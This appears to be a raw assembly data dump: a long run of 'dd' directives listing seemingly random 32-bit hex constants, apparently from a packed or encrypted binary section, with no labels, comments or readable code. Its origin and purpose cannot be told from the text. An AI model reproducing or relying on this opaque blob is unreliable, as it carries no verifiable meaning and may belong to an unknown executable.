dd 6F81D47Fh, 7B0E33Fh, 4B67CCFEh, 0DB2BD0C2h, 8B8C00h
dd 0F8EC830Fh, 0C010F06h, 31320824h, 5866F808h, 0FD320258h
dd 306AF802h, 0FF320259h, 0B647822h, 20320219h, 890FFA08h
dd 4AF0AAB2h, 10712405h, 0E6838FFh, 3E62850Fh, 140000C0h
dd 80577890h, 0E926E98Ch, 72260EB8h, 8796CB8Ah, 0E8B15903h
dd 0A80602EBh, 8A603B10h, 0F707FAA3h, 823A6500h, 64EA0487h
dd 3F04AE3Eh, 0E42F690h, 698AE037h, 0F4E3CE08h, 5EE4FEEh
dd 66511B08h, 650F68Bh, 0C205C2D3h, 4F41C910h, 7C008005h
dd 0C3B65876h, 1418C005h, 2B57F785h, 0F629DA80h, 0BA0F2F28h
dd 0F707FBE8h, 24CAFEFBh, 10029118h, 2D3B5FCAh, 4DD83B55h
dd 0BB1130AEh, 0C1100370h, 51C5F287h, 0F789C63Eh, 0E45B06B3h
dd 854BDC02h, 7CFC8F07h, 9114A47h, 0DB1B3E2Bh, 4DCBF53h
dd 60400042h, 0DD228F01h, 6C23DD02h, 810DAC18h, 6870D518h
dd 28D4169Fh, 970E63C2h, 0CDF00009h, 6144ABDCh, 24E970CBh
dd 38F6D910h, 0F5D49C2h, 7E748BC9h, 135BA740h, 8CFD820Eh
dd 3C893D47h, 278D6387h, 0ABACDC99h, 419F1E3Ch, 34AE89CBh
dd 0E54CEBA1h, 62C6AEDh, 9631353Bh, 61AB33D7h, 0F462857Eh
dd 29D79403h, 49087AE0h
dd 2C527C1Ch, 0A2CD2200h, 0AD0DF2C4h, 82198430h, 383B6A9Bh
dd 0CA5D889Eh, 0F821680Fh, 3C58ACD4h, 1A387036h, 9F428F6Bh
dd 64C29683h, 3A03FAA8h, 0D491ECAEh, 881D5300h, 3CC22704h
dd 27F5440Ah, 0AB536587h, 8B3862A4h, 8092412Ah, 97D20447h
dd 4DDFDB9Bh, 454EDBFEh, 0D7A72729h, 0DFEF8041h, 0CEB91199h
dd 0C105h, 33A73F85h, 7F658C76h, 2A16299Eh, 42C45712h
dd 61800718h, 0B424B686h, 8CD21120h, 38988AB7h, 58C34B2Ah
dd 0A1A920FDh, 0ED875627h, 15C18BFEh, 26AD8882h, 58B47FD4h
dd 932C70CBh, 46644961h, 0E39153D9h, 0D55FA25Ch, 4881508h
dd 0E2F12599h, 0A6920523h, 302926DCh, 23EF3B18h, 82ACBA67h
dd 1CA83B81h, 1B02ED38h, 0AC8A5D80h, 3C88C016h, 9F18F22Ah
dd 3C9C0A08h, 2A20E519h, 0B846DF44h, 3EC5E08h, 6C335676h
dd 619A11B2h, 0F60D9209h, 361292E8h, 774D1C59h, 24EB0993h
dd 0EE6756D9h, 0C26D83h, 0B585EB58h, 0D2D332F0h, 1F2E51C6h
dd 17DC5DA3h, 5783663h, 24682AF8h, 4C8B967Eh, 0B72601BBh
dd 781723F8h, 90086040h, 68459040h, 554EA0AFh, 0CC0BDCCCh
dd 0F61B0435h, 12036E9Bh, 323FFD7Dh, 66A1F4F3h, 4B2112D8h
dd 49603D47h, 8E694849h, 271FBD2Dh, 4BD7E90h, 93369EF3h
dd 0D5124D74h, 1ED0964Ah, 0CD2707E8h, 6C37938Bh, 5DD90964h
dd 7ACAF041h, 0E38887BCh, 82881E0Fh, 24B00136h, 8C225923h
dd 0F0107963h, 22519856h, 9E882CBBh, 84858150h, 0EA48B1C4h
dd 0DF1F2488h, 0D01957C0h, 0F2AAFF6h, 0FDE23849h, 6D6EE3F1h
dd 60A559Ch, 5676B12Eh, 0B05A5481h, 0C68A580Fh, 2FD8D3C3h
dd 0E0749090h, 63607787h, 0D8A123Fh, 4090D704h, 0A2B89F2Dh
dd 7DC30303h, 0EA77C003h, 410A4718h, 1788D921h, 9DA8C509h
dd 9E92C8C0h, 52C34623h, 0F7108709h, 0C10446D2h, 1892047Dh
dd 6E1B860Ah, 2840B303h, 0BC307610h, 6A03035Fh, 88F9B60Dh
dd 3BCB241Fh, 0DD265200h, 5F15B222h, 0A2404709h, 78DF2164h
dd 28D61615h, 0FF18A810h, 6F611AC2h, 8C863E7Bh, 0F25882D3h
dd 3D86307Eh, 99F6BF0Fh, 9BED0837h, 5AE81F49h, 0F32449E3h
dd 0C3D820Dh, 4E4960FFh, 2C021D4Fh, 363C5832h, 30F633CFh
dd 382BE792h, 6702AA91h, 6FF14C8Eh, 9141F4C1h, 6B0DB0CCh
dd 0BA03A396h, 0DE2F303Eh, 2F9D3740h, 169A08EAh, 0F0AA80Ah
dd 51E81811h, 0E7945F71h, 0E0C6C153h, 0E40E805h, 0E930406Ah
dd 0E355C1A8h, 0A628ECA6h, 900B4850h, 0FF7DA851h, 8031D54h
dd 3AB02303h, 5843CBDh, 0A9F2614Bh, 0F50EBDD3h, 0C8447C9h
dd 320D9802h, 3093D832h, 0D2461FB6h, 96CE42D8h, 0D1F85FECh
dd 4B6F01Ah, 58B00065h, 3913D33Ah, 763D8DECh, 4421F016h
dd 4FF28841h, 128C838h, 7C5A1452h, 480E0316h, 1C4923F6h
dd 3F117DE4h, 84583DBDh, 6EB40901h, 7E8DE11Fh, 2C208E01h
dd 10061C40h, 144A891h, 2E7F65DEh, 0C080000h, 9302BEFFh
dd 5760A0D1h, 30443B15h, 0C9A826E0h, 9795F70h, 0A830204h
dd 11EDC8B0h, 4ECED808h, 6D41C223h, 3092E57Dh, 36E2548h
dd 785A6A1h, 8BD1D08Bh, 0CFFB87F7h, 4BCC5201h, 0C565DF56h
dd 0B375FD60h, 55837582h, 159EAA76h, 3593224Dh, 0D81F60E4h
dd 0CB34677Ch, 4B76AD20h, 5B527F1Ch, 0F73E8046h, 46FA7500h
dd 915DAAC8h, 0ACE1286Bh, 25D9B12Eh, 8C76F27Dh, 5120BD2Bh
dd 0F58789D0h, 0EAB2E203h, 68C90235h, 52720F05h, 0B010E1B1h
dd 716C2A30h, 0E86B640Dh, 792D78E4h, 76599504h, 0AFA44BECh
dd 0E4F7898h, 82FC35h, 0CE1B4C04h, 0F2F43C23h, 0D90B6155h
dd 0C3F6232Fh, 4D3634A1h, 0C0A36129h, 0D4AA2034h, 0B0D3251Ah
dd 20356F12h, 33380AB7h, 8B18E04Ch, 35CA046h, 0B3023CC4h
dd 3321B935h, 0BB0002C1h, 0ABA04DCFh, 283E9334h, 8FC20964h
dd 42B14D4Bh, 74930A19h, 2284DF8Ah, 0A2F5022Fh, 2EF95A2Bh
dd 24C0C1A5h, 77B0F1FEh, 25598850h, 0D199DE64h, 7C2A0B0Fh
dd 0EDB94AF8h, 3303E51h, 786B1C0Dh, 5A434E60h, 23308621h
dd 3A8019D9h, 0EE78A9ABh, 4B284D65h, 0DDF48F6Bh, 2702CD7Ch
dd 0A5DF887Bh, 1538BABFh, 0DA04135Eh, 0A316727Ah, 77D40AB2h
dd 8D842BB2h, 0D7A61006h, 0F439B545h, 7F048759h, 0C6830E8Ah
dd 0EC2C6E05h, 0DBC2A3DCh, 46102803h, 7EF1EF93h, 0D9A984B8h
dd 4F495E38h, 0FB6CA5B2h, 0CF3F87F7h, 5DA286E0h, 36728F90h
dd 0DE537C72h, 0AA5AA004h, 2718290Ch, 0AA873E78h, 5EBBA941h
dd 56505171h, 525D515Fh, 7D105E59h, 590075FFh, 0E83D555Fh
dd 77085A97h, 5E546055h, 81147825h, 28C17CD7h, 0D9610000h
dd 4D217AC6h, 710993D3h, 0C62C3867h, 43449C48h, 306D4890h
dd 0D22BF122h, 2249201h, 1A5F84C0h, 895305CDh, 254F2902h
dd 8083F93h, 59DF71BDh, 0C1F63D15h, 0BF6ABB80h, 871A16ABh
dd 0DD60CE10h, 261E384Bh, 66C13906h, 0D89F5442h, 0B7296E03h
dd 0EB950E64h, 96AD1778h, 97757FC0h, 49464256h, 0CC112A08h
dd 4B864F7Dh, 19771344h, 0FA0F1039h, 17E82h, 9D400800h
dd 26264E61h, 54B280D9h, 21BD1D1Dh, 52C6C5E4h, 968A0DAAh
dd 0C243B1C8h, 1D529D72h, 6F3D93E6h, 0FC90964h, 30837C30h
dd 1459102Ch, 3CA8B3Fh, 8BE13C4Ah, 42975049h, 7B297831h
dd 2D6CB22h, 1477D7B6h, 0B7C5162h, 3D811B36h, 5889C23Ch
dd 0B655E1D4h, 400A3AEAh, 348D6980h, 0B7F864D0h, 6487BF0Dh
dd 848531DDh, 51C7DFB1h, 7308FF39h, 890E8B73h, 40B9E901h
dd 48707C12h, 0DE7D9211h, 9BCC7D66h, 2382F1F8h, 0D4B92754h
dd 81B20180h, 0C1040E5Bh, 8441A7ADh, 8EFDC765h, 0D92224D8h
dd 0CCEDB163h, 82C4260Fh, 22286E0Dh, 27B28223h, 16388076h
dd 0B57184E2h, 197BD4FFh, 0C9B29758h, 20B246F5h, 648AB398h
dd 5E63C6BEh, 0C6FB2C5Eh, 0D74F8211h, 0B6626F5Bh, 7972D37Fh
dd 63A92106h, 0C90B8144h, 974A80E2h, 584D05B4h, 681E6B01h
dd 2C03BE2h, 2DB88F25h, 31076989h, 38C44421h, 2A649840h
dd 3FB45E7Ch, 5038D2Fh, 0C1EBE0A0h, 3E3184F1h, 6A05203h
dd 2607D047h, 831F8492h, 0FE889D28h, 947C84h, 59AEDBEh
dd 7EEC683h, 12801A73h, 1D824462h, 375898Dh, 0D1488FA9h
dd 46FF1E2h, 703F7FBDh, 75D40310h, 0F6659350h, 0D0F22B88h
dd 494C5156h, 8A205A58h, 365D66C2h, 0E71F5DEAh, 27FEB1D2h
dd 12385D11h, 659D079h, 4D24A04Eh, 9B80091h, 0B122E46Bh
dd 383BC20Ch, 18054CDFh, 0B9283719h, 359DE0D8h, 14E1F675h
dd 9F4118B7h, 21C90FC5h, 3E478CD6h, 0A39A549h, 6A17C8B7h
dd 4F4E38C6h, 6A25EF71h, 0E2364F4h, 748D6822h, 5EE83975h
dd 0EA6D1F05h, 7DB841D6h, 5C937C82h, 67B9457Ch, 50597002h
dd 28932731h, 745A583Eh, 886E085Eh, 25C3930Ch, 0F876E9C6h
dd 2CA9h, 0E00B72C8h, 0BF3F7E9h, 94D9B5BBh, 36A1A61Ch
dd 0D8A07971h, 80E56A26h, 3E0034Bh, 4B376EE8h, 0D08BECF2h
dd 2F01EFDh, 82DFA3BAh, 8374D9Ch, 2D1768A7h, 0EE646A96h
dd 1DEDC322h, 2884E25Bh, 9205B4FBh, 3638F5F7h, 24FE0F57h
dd 12B79C37h, 18871E14h, 9358409Dh, 248503FBh, 2D8020D2h
dd 23050F5Ah, 83453623h, 287D3E56h, 0D3F89E52h, 209782B8h
dd 41769C87h, 8C0A5751h, 563C8AC6h, 0E8091552h, 0E963745h
dd 84565544h, 0B4B7C003h, 6FB53856h, 41FE0376h, 0E1A45F88h
dd 0A2AC022Eh, 9512A13Ah
dd 268BA668h, 6D9EF005h, 0E5382F18h, 0DDBAE8B5h, 15246E2Bh
dd 0FB8BFD8Eh, 80528C0Ah, 4C615490h, 0FB6F050h, 43615400h
dd 0D703E454h, 0D603BE82h, 0C15E10B8h, 57489151h, 7E2C183h
dd 43449551h, 0D4844B4Ah, 45A30482h, 6BD82D20h, 41C101D0h
dd 3F79C283h, 0C11E9D15h, 2EAAF1A1h, 0B930221Bh, 6CCE31Bh
dd 2450F8C5h, 9D915D2Ch, 2687BB3Ah, 0D7C620DAh, 11E513CFh
dd 83C4BB02h, 2BDD5060h, 0D921C679h, 0ECE0212Eh, 1152F21h
dd 5978748Dh, 8662C041h, 52F10520h, 41C2EF88h, 1A028F3Ah
dd 64043EA8h, 8A925594h, 13CA09C6h, 0C27A8196h, 2F7C23B7h
dd 0F56BBA80h, 9BD9AC3h, 0B87BDD1Dh, 0B2F10001h, 0DD244180h
dd 3D2C8EA3h, 0D28C5EE2h, 3A51B66h, 957226E0h, 0B1573A99h
dd 0C10E9B00h, 4CBD52F1h, 515850C8h, 0EA4D8420h, 0F1A43064h
dd 2149E50Fh, 59A6AD2Fh, 86EBE3Bh, 0A541007Eh, 8700F0C4h
dd 760992B2h, 245F5AF0h, 4B0BCF7h, 0D6225CDBh, 58B3CB88h
dd 19A2FBC5h, 93A322A2h, 0B2940885h, 3D0E6CB0h, 0CEC25EFBh
dd 6679FE38h, 0DAC38BABh, 0C08AC303h, 0C68F58ECh, 0A95B7D5Ah
dd 0A7CCB3E2h, 3F5D8355h, 42315D48h, 0C031BB63h, 0D9248D76h
dd 8BA50EB7h, 4FC5D980h, 4D147Ch, 7EBDDC87h, 0DF01B41Dh
dd 0AAC38A6Ch, 378241C3h, 3E0308DFh, 46F3421h, 7CDA1F18h
dd 83515F66h, 0C1C5020Ch, 0B1538FA0h, 0F649A584h, 1C874030h
dd 6CE8090Bh, 8C1818ADh, 0DD241B34h, 365D6D3Eh, 0D5894908h
dd 0F002C3ABh, 0C1B05F14h, 141974AAh, 81891841h, 6030FDAh
dd 60FFCBD0h, 6707BAC1h, 9ED60D8Eh, 4222887Bh, 0AA27633Eh
dd 0F2C19FFCh, 6EF5600h, 5D760F90h, 214D1145h, 0B479201h
dd 24C6F8CAh, 6CC8A207h, 0F00CED8Bh, 0AB8A15B4h, 9888602Ch
dd 0F942A2C3h, 68B0E283h, 22F689AAh, 20AB578Fh, 6FB23401h
dd 0FFF8C6D7h, 0FC24FF8Ah, 0C3B09F82h, 9204E28Ah, 69A210CEh
dd 0EAE210E8h, 0E00F4B2Ah, 99F68002h, 0A903B123h, 1EF8CC76h
dd 19B578ACh, 64092C43h, 4F10981Dh, 15D9188Ch, 9B2AAB8Dh
dd 0D58B085h, 0FB1C99DEh, 0C67A7D63h, 8958F8BDh, 4523C338h
dd 4BF63116h, 0E2049588h, 0A396B7DAh, 0A04289DAh, 0F15CB1Ch
dd 61505EDh, 0D1064892h, 4362BE56h, 0B4CCA7E2h, 0FE76ED52h
dd 4F6C5FF5h, 4A086771h, 1BED9FD8h, 7EFEBCD8h, 148BC92Bh
dd 2C66819Bh, 0A1481F67h, 1FA1C366h, 0C39A3AC5h, 0DF037507h
dd 81A45BF4h, 6F5E2CDh, 55948504h, 96808D92h, 49CFE411h
dd 5D15DDACh, 64417DCFh, 6390A000h, 8029621Fh, 0DEC385FAh
dd 38FE0h, 0FBBED910h, 0C72CAAD2h, 629D01B5h, 0BF2E4035h
dd 0AB2B35D4h, 0F435324h, 9F91A35Ch, 0AF03B73Bh, 29B70F4Dh
dd 119DEC2Bh, 5D1730C0h, 43899BA4h, 68ED3BC7h, 850FC27Ch
dd 759D48BCh, 88352555h, 0E2606B83h, 8F512940h, 791323DCh
dd 2690E300h, 7886C571h, 0EB1D909Fh, 4C0437E6h, 0B3A0B3F5h
dd 50D9EC9Eh, 0E136ADCAh, 8CA3A22h, 8B6448A0h, 0FE80EDh
dd 0E5DD8ADEh, 6C85408Ah, 6612A846h, 0C2F6F020h, 0B60906B0h
dd 0D02418BBh, 8198EAEEh, 81872872h, 0A3E88EF9h, 0EAD7610Bh
dd 81FFFFFCh, 0E9072079h, 3BBB10ECh, 0BF2200B8h, 0D8F6C28Ah
dd 8D5C8C1h, 448A02ABh, 0C448885Ah, 2ADE0609h, 0F0A8E23h
dd 0ABA8D78Bh, 0BF825CA4h, 8DAAE9B0h, 30447F8h, 45C2BCEh
dd 0E55ABD8h, 65F8081h, 0F4C1C9BCh, 0E0AA00B0h, 0B1BD4372h
dd 0A7AB0EF1h, 0DB750DBAh, 10B37C0Fh, 31E6758h, 0DDC21334h
dd 0C21EC3B1h, 9CBEA83h, 0EBD9304h, 33CBD08h, 3409C38Ah
dd 0F4567E74h, 44E4A51Fh, 90628476h, 88B21AC9h, 0B0866239h
dd 2CD462BAh, 4767BF6h, 502C17CBh, 5D02E85Ah, 5970EA21h
dd 0C9A26262h, 16B04118h, 88608296h, 89748612h, 591C533Ah
dd 0CDE8B246h, 5FC9A616h, 2802EA26h, 0FCC10303h, 0C045F098h
dd 0AC2E1AEBh, 76EC6E9Dh, 788FF552h, 0AC37221h, 0EF38C266h
dd 7838530Ch, 0E60B3BAAh, 5592415Bh, 0EC11D0A9h, 646C1383h
dd 0BA7FF5B0h, 0AAC5CA02h, 4828B99Ch, 8ABE3874h, 0C1F412A2h
dd 1B190FB0h, 8C2F823h, 0B64C0C8Bh, 39D13C20h, 204AEE02h
dd 56185A75h, 2EDFE48h, 0F583D3FFh, 0F8205025h, 0DEE903FAh
dd 0DB69A5A5h, 6A043EBCh, 49E3A7D4h, 0C3782EA7h, 8159D275h
dd 436718C6h, 7AD68427h, 2609E59Bh, 300C8087h, 13C961AEh
dd 0FA49DDA8h, 68BFBFFh, 0CC3CD08Bh, 0F97EB875h, 3D87203Ch
dd 18B8B82Ah, 40AC9A51h, 5369B58h, 21607A7Fh, 2C43111h
dd 0D4CD48CAh, 7AEC4859h, 0EB036095h, 8A2D062Ch, 824A1037h
dd 0EA928010h, 1AA120CDh, 3B37BF0Bh, 0AAFE90B0h, 0FE7BE9ACh
dd 0C908FFFFh, 68A1473Eh, 7242BD4Fh, 9A331C6Ch, 0E29C90AAh
dd 41C9C7DFh, 0D5626731h, 97D42064h, 4622B548h, 261C5D9Eh
dd 33548B07h, 820A1F5Bh, 0E840C18Bh, 0EB3C57h, 7D2E9AD7h
dd 66F0E480h, 0CABAD3Dh, 604B3799h, 9E8B63Ch, 973C682Dh
dd 0A984D3h, 3CFC53DDh, 1B09B7E0h, 3CF0F61Bh, 11CD0970h
dd 2566F692h, 0ED3438FFh, 990E10FFh, 2009D202h, 1BFEF8C0h
dd 4F6E8h, 83B8E204h, 3A1474A4h, 748C0B62h, 0EEDA1419h
dd 0E1302810h, 244980E2h, 0D80C7812h, 6EC49B24h, 97A49E61h
dd 72897506h, 6B2F1601h, 91597F58h, 3EE9A4F3h, 0B6FB5215h
dd 94A7A7Bh, 87BD1A83h, 0B61AEDBFh, 0DBC48B03h, 8B6B037Ch
dd 0E8301E3h, 0F5B049D4h, 23DE813Eh, 0AFD4B161h, 60875923h
dd 360D95E6h, 14C782Dh, 14D73760h, 8F95D5C4h, 5EA89553h
dd 549B5974h, 0A8387809h, 0D9695801h, 8D608C2Ch, 0F1AB230h
dd 6F00E5F4h, 518B2D41h, 40FF797Ch, 8E1C3A87h, 3BC185DAh
dd 0D9222051h, 84E36366h, 0A0C7407Ch, 0BA8EA968h, 0EBC2F430h
dd 9B91BC6Ch, 0D8C12DAAh, 9EC68B49h, 87832E24h, 40A8460Eh
dd 2E976C64h, 3C8B969Bh, 9863B4E3h, 774AD4E8h, 955CD9Ch
dd 2725D9D6h, 9F19CB30h, 7694C53Bh, 9ACEB126h, 3BC6201Eh
dd 0FA23F04Ah, 0ACA30F57h, 0B44491D8h, 0EB427DEFh, 0F7B83403h
dd 0E2A3061Fh, 0A5AC5CBBh, 3C19843Bh, 8005B817h, 389FE058h
dd 590F5241h, 36E464A8h, 0FE78231Ah, 25E5AB43h, 6C8EB545h
dd 1AAB26Ch, 0E0034697h, 45738945h, 2FAE933Fh, 0C41DFF42h
dd 6B20C99Eh, 0BC55CEBEh, 0E12C3699h, 0C8DCBA1h, 7B931E87h
dd 94E0D2BBh, 0C1764318h, 9F634D7Fh, 0E92C1B71h, 0F517CFBEh
dd 81EAC332h, 23964CA4h, 0CFCE5778h, 0B18DF151h, 938927EFh
dd 301D3864h, 9FDDD4F9h, 9E2CEB1Ah, 291E3923h, 0A0D881FBh
dd 87EDD2C4h, 5C4674D5h, 214BA87Ch, 3D294A4Ch, 2AACED45h
dd 0C52103F5h, 704C5220h, 708042C9h, 9357D019h, 791B5E78h
dd 23554A0Dh, 5C59BE3Ah, 0A4828E31h, 0C0AFDB1Eh, 461FE1ACh
dd 88D14E38h, 82DCD06Eh, 2BC4AB26h, 25A9CEC6h, 0D4C07482h
dd 0EA898155h, 5A505E3h, 0ECDCE58Ch, 9DF73D03h, 0E2433047h
dd 4950C068h, 0DD2728B5h, 338703E8h, 44A16A11h, 83110BE6h
dd 53185D94h, 8B773363h, 26D140DFh, 31A0F724h, 0BF8300EBh
dd 21DB48B6h, 2C9CE2BBh, 0F2BDD6h, 90AE8611h, 5F986089h
dd 9A940323h, 53287C18h, 789A6475h, 4691004Eh, 3D4189A0h
dd 4C3367BBh, 5F5EFD5Ah, 4C8BC359h, 0E8535EBEh, 47270800h
dd 80320364h, 940D000Bh, 2408431Fh, 200B011h, 80E9F36h
dd 8203C100h, 1744D710h
dd 0B07020C1h, 0F77BE675h, 16C0037h, 416CA803h, 3411B5Fh
dd 85424006h, 20E0081h, 0BB17C020h, 60210320h, 90204DDFh
dd 0A3DF2C58h, 850320B2h, 1902F787h, 1743082Fh, 0C2C003B0h
dd 3B245B7h, 1F6C7758h, 1B2F6123h, 27628BFh, 0C1425720h
dd 708B000h, 6FC80818h, 0D8039105h, 222F00FFh, 0B00761h
dd 2828FF39h, 20007Dh, 4C039400h, 0C8089540h, 8741E393h
dd 1B1F612Bh, 4736005Fh, 2780414Dh, 591F4A58h, 21FF4300h
dd 2B5B3F54h, 0FFC02BD2h, 8AF7E280h, 140B4101h, 0C2F683FFh
dd 3CF27508h, 3274FFF6h, 2E74F73Ch, 74E8CD3Ch, 115F3C37h
dd 80C6F640h, 44E75DBh, 6F75DB40h, 75DA201Eh, 4DF0950h
dd 2BC18B58h, 0FA840244h, 707E281h, 2C29AEFh, 0C3ED5BC6h
dd 0F628CE80h, 0D2753801h, 6DA9A907h, 0AF5204CDh, 0C52639DBh
dd 0E6B60768h, 945AFDC0h, 0FA4D0483h, 0FFFAFF83h, 0C28BB175h
dd 80EAD1EBh, 1CDD20F6h, 6BFAB75h, 80A6EB21h, 5702B7F2h
dd 0A8B77510h, 0B5EB0607h, 0CB211A3h, 7A0DAC6h, 389B0CDBh
dd 66E08ABEh, 9FDF0725h, 8374C0FCh, 3C2D247Fh, 575DD04h
dd 7B72416h, 0B7744012h, 74800417h, 0FD9F4600h, 850F05F8h
dd 0F374061h, 0B1E904CAh, 1E60759h, 197751E9h, 7C0E7406h
dd 23CDED29h, 0EE1B3DB1h, 735E902h, 0DF97E8C0h, 919EBCD8h
dd 81429091h, 9E9093FBh, 967F049Bh, 8D9E8D9Dh, 19DFB686h
dd 91B66F7Dh, 116B9E89h, 9A897F15h, 90968C8Dh, 90DF91F6h
dd 2B582099h, 2F0AF45h, 0E2F17042h, 320E1C3Dh, 1CC303DAh
dd 191B54C6h, 34EED1EAh, 1210BCF7h, 50489282h, 530D6A18h
dd 10AF442h, 0F3241416h, 0B023CEC1h, 5331D47Eh, 837896FEh
dd 40080000h, 5D3D41F9h, 25921157h, 63D0C182h, 5241B517h
dd 4FAE1ED7h, 0BD061081h, 8003A3A3h, 5461C13Dh, 0BA3C7E6Eh
dd 53FC108h, 8D414C64h, 69F80066h, 6A00B30Eh, 8F3E19EFh
dd 0DE3200D2h, 6F6E60D0h, 583AA01Ch, 90054CB0h, 79C62980h
dd 0E81D1354h, 2C22C334h, 0C9EC0675h, 7CB9A974h, 618B0E06h
dd 0A6645E25h, 0D6F9F0F9h, 129D8F64h, 87D99E5Bh, 0AC61296Ah
dd 57B5286Ch, 6B258280h, 2C9B22D4h, 3410CA66h, 0D00616EFh
dd 6A80C687h, 87559A0Ch, 0F76EB08h, 180A6B74h, 8B1E0528h
dd 93065403h, 0F1A157CFh, 0E458A5DBh, 2D61158Bh, 0A9D5E4E0h
dd 0FDE214Dh, 0C6A36A81h, 0E2D10F77h, 0E81569D9h, 31903513h
dd 2AFA037Dh, 80845E0Ch, 8380F7ADh, 509D195Dh, 2937CF55h
dd 98339A0h, 0DC2A2B26h, 52CFBC42h, 150FD0C6h, 0B9E37B0h
dd 46880F63h, 80C23B46h, 21001743h, 66CB3651h, 8250F0Eh
dd 6B03627Fh, 86E125Ch, 0C0AAA8EFh, 0B53975C6h, 60008750h
dd 0D9AF5108h, 240481FEh, 3ADE68B1h, 8201092Bh, 88B13134h
dd 0D48CC3A7h, 8720BFEDh, 0C0011D30h, 40661317h, 6F4EF7FCh
dd 0E08C068Dh, 0CE28ACAEh, 0FCAC74A3h, 0F82DF6B4h, 3B5F360Eh
dd 62444A6Bh, 0D3DB30B5h, 8057F45Dh, 237D4946h, 305EE0BCh
dd 0F7B76190h, 78D00225h, 9A6AC9BAh, 20E5A8D8h, 8015661Bh
dd 6B324DBh, 51C1C12h, 0DB7C0C5Bh, 0BA08FA06h, 59BD4B04h
dd 0C69F1800h, 480E313Bh, 7E8D18Bh, 0AB1108B8h, 0C18F2041h
dd 29AF0CEBh, 42202432h, 0C8255FD5h, 0D7AB02EEh, 0B4A1CD4h
dd 5C6FE59Dh, 486ED780h, 0EFD1F028h, 0DA8B1162h, 6F683E96h
dd 0DEC02279h, 3D21776h, 8AAC94FFh, 88D2F610h, 844010FCh
dd 218875D2h, 85D155CAh, 0ED59B411h, 4AE67011h, 8AEC01C7h
dd 0E1E74717h, 8622D183h, 0FA950EE8h, 65737500h, 85B50072h
dd 93D1B815h, 89DF4858h, 9106AC4h, 3F0522BCh, 0C4248E80h
dd 5F2307B8h, 838F2524h, 0A8132D07h, 0A03B49F6h, 523C0C2Dh
dd 1EF40C9Bh, 0A0E42011h, 0DEA66F10h, 59012B6Fh, 0D58728EFh
dd 4F772303h, 0C50A006Ah, 0AB903055h, 0D5170F67h, 0A1ADFD82h
dd 14A183A0h, 171DC225h, 0A032D074h, 4634321Fh, 0F450706Fh
dd 6848CBC6h, 15B52622h, 0B2D45286h, 6AD97E11h, 0C2C92800h
dd 78B25901h, 0C00000F3h, 0B0D160F1h, 0AC616068h, 41F83826h
dd 994D0092h, 0D6657DE1h, 9FBB80B8h, 2F12561Dh, 0C3BFFCF0h
dd 83C62041h, 0ABC11E1Ah, 0C1B20ABBh, 6724715Ah, 4D6ABF80h
dd 0A2FF7168h, 5053A8D2h, 0C428F8E8h, 7285FFFFh, 6E15FF43h
dd 2017BFDAh, 8C00990h, 76738379h, 4D3569F6h, 0E4129F51h
dd 0D54908EFh, 0BFBAE86Fh, 8F89434h, 0F4EC399h, 296F1908h
dd 4D2DC6D9h, 6F043A2Ch, 0F9AD70E7h, 80946410h, 0AE09B291h
dd 0FD09A837h, 835FBD8Dh, 0DF854400h, 6E80B943h, 0F38A2785h
dd 70424B5Ch, 3C609254h, 45F93414h, 0A6DCD27Eh, 25984F8Ah
dd 65F0ACC1h, 0DE614791h, 9602D237h, 21271A27h, 97C68A09h
dd 577C4D66h, 1B090077h, 0EE0BE91Ah, 6A0875FFh, 0E2FC8BCCh
dd 92FD74A6h, 0E303FC7Ch, 844513F7h, 0B0508CF8h, 0BE886441h
dd 92FA2EB4h, 9795AC52h, 2C912A5Ch, 0E0099980h, 58860209h
dd 4125D609h, 0A8B06A88h, 0BCCB4BEFh, 9A370439h, 0E24E63E4h
dd 4D6FF58h, 227506F5h, 0E85FA417h, 0B7E96450h, 4338D0Dh
dd 0D3388560h, 68260168h, 38D330E6h, 0AC954135h, 46B06A75h
dd 0B4FA485Eh, 0E390287Dh, 62DC8D1Ch, 0C654208Bh, 90A37745h
dd 947D075Dh, 9C12B86Ch, 24B10012h, 329B0FDEh, 984DDDA0h
dd 0AD5811A7h, 0BF614FB2h, 4EE0E0Ch, 39030708h, 84F64C5h
dd 0E3456087h, 0D8616h, 458F1F9Fh, 2E046FBEh, 4503AF64h
dd 11D91888h, 8C33418Dh, 747BF255h, 2EF4D151h, 0A62A83C8h
dd 7DA80904h, 0BA4B1402h, 0AC5DB403h, 0A16919Bh, 20723A78h
dd 20CD2247h, 316AAE59h, 1E067AEEh, 0F39BEB35h, 6445799Bh
dd 0C432E0A9h, 0F68ED8DFh, 0A48FFFFh, 652BC70h, 7B58102h
dd 0DDBE0982h, 0B2B20B8Dh, 87FA64D5h, 6039BA15h, 17C1202Bh
dd 611F39B2h, 43262208h, 46A229C3h, 751D7C8Bh, 702D2722h
dd 837051F8h, 0D960CC4h, 0C724EE81h, 0C7370F5Fh, 0CD01E181h
dd 70BB922Bh, 0EF476810h, 34C7E7FFh, 0A015F28Fh, 1CAD305Dh
dd 0BC094EB9h, 0F0BCB60h, 21041CB1h, 0D433AA13h, 972D7EE1h
dd 0CFB7260Fh, 7CCA353Dh, 2618D755h, 6310A0F4h, 89C00518h
dd 0FE689997h, 0E2973566h, 0AA00F0C1h, 675423C0h, 2F040F3Ch
dd 0BA99982Eh, 0B06ADF06h, 69A2F8B6h, 0E75B78FEh, 8C25E029h
dd 80609809h, 70973AD2h, 0C01E908Bh, 0B10D8676h, 68E6FC49h
dd 68CD43B4h, 0BE827327h, 0A3B4E52h, 0FF8C9h, 59DE7DB5h
dd 47C9251h, 3509D951h, 311F2025h, 0B55236C2h, 57C90A7Dh
dd 8A3A2440h, 0EC1AC37h, 0E90D216Eh, 5114990Ch, 8EED422h
dd 809AC354h, 0DFB902A5h, 3BB4403h, 0A2075113h, 0F8FE4622h
dd 0F2441237h, 5EC83BF8h, 0AEB4E980h, 697EBB53h, 0C68158B4h
dd 0E80682EBh, 0FBF60D7Fh, 7F297758h, 22C268F3h, 0F3FF2108h
dd 0C969C62Bh, 0E1FBAC58h, 0C13B5BA5h, 0C1F2FD52h, 3EDCDFCBh
dd 4B03F3F0h, 29FE0113h, 0FCA1BF2h, 8D8216BEh, 0BF2D9EBh
dd 0E983FA1Dh, 0EB852A5Bh, 0B9A81F4h, 45BDAEC9h, 0C20BCDFAh
dd 0B3A3EA80h, 38839976h, 8103C9FFh, 0F17DD8EAh, 0EE1695BAh
dd 0F37D32DDh, 0B55F18B2h, 0CB61BC0Eh, 9661D32Ah, 2BD332FBh
dd 84AD5ECAh, 6805773Ch, 0F3FFD0F7h, 92CEF281h, 4803880Bh
dd 1688FF2Fh, 0CEB70FF2h, 6FD98DF7h, 0FFBF01A5h, 4BF24201h
